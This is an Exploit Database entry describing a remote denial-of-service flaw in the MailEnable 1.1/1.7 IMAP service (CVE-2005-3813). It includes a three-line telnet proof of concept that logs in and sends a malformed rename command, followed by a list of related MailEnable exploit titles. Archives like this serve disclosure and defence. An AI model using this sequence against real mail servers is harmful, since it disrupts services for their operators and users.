Exploit Database - Logo

MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service

EDB-ID: 26575 Author: Josh Zlatin-Amishav Published: 2005-11-23
CVE: CVE-2005-3813 Type: Dos Platform: Windows
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/15556/info

MailEnable is prone to a remote denial of service vulnerability.

The vulnerability presents itself when a user issues a malicious rename request following authentication.

Remote attackers can exploit this issue to trigger a denial of service condition. 

telnet localhost 143
a1 login josh byebye
a2 rename foo bar

where josh and byebye are the login credentials for an existing mailbox.
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2005-3813
Trying to match OSVDBs (1): 21109
Other Possible E-DB Search Terms: MailEnable 1.1/1.7,  MailEnable 1.1,  MailEnable
Date D V Title Author
2009-08-31 Verified MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)fl0 fl0w
2005-04-05 Verified MailEnable Enterprise 1.x - IMAPd Remote OverflowExpanders
2010-07-07 Verified MailEnable - Authorisation Header Buffer Overflow (Metasploit)Metasploit
2010-06-15 Verified MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)Metasploit
2002-11-18 Verified MailEnable 1.501x - Email Server Buffer Overflowredsand
2005-11-20 Verified MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow (Metasploit)y0
2005-03-17 Verified MailEnable 1.8 - Remote Format String Denial of ServiceTal Zeltzer
2006-06-24 Verified MailEnable 1.x - SMTP HELO Command Remote Denial of Servicedb0
2006-11-29 Verified MailEnable 2.x - SMTP NTLM Multiple Authentication Vulnerabilitiesmu-b
2008-03-07 Verified MailEnable 3.13 - IMAP Service Multiple Remote VulnerabilitiesLuigi Auriemma
2008-03-11 Verified MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Serviceryujin
2012-01-12 Verified MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site ScriptingSajjad Pourali
2005-04-25 Verified MailEnable Enterprise & Professional - https Remote Buffer OverflowCorryL
2005-04-05 Verified MailEnable Enterprise 1.x - SMTP Remote Denial of ServiceCorryL
2012-08-08 Verified mailenable enterprise 6.5 - Persistent Cross-Site Scriptingloneferret
2005-12-19 Verified MailEnable Enterprise Edition 1.1 - 'EXAMINE' Remote Buffer Overflowmuts
2010-04-30 Verified MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)Metasploit
2007-02-16 Verified MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflowmu-b
2010-04-30 Verified MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)Metasploit
2007-02-16 Verified MailEnable IMAPD Professional 2.35 - Remote Buffer Overflowmu-b
2004-05-09 Verified MailEnable Mail Server HTTPMail 1.x - Remote Heap OverflowBehrang Fou...
2004-11-25 Verified MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflowclass101
2007-02-14 Verified MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Servicemu-b
2007-03-02 Verified MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflowmu-b
2007-02-14 Verified MailEnable Professional/Enterprise 2.37 - Denial of Servicemu-b
Menu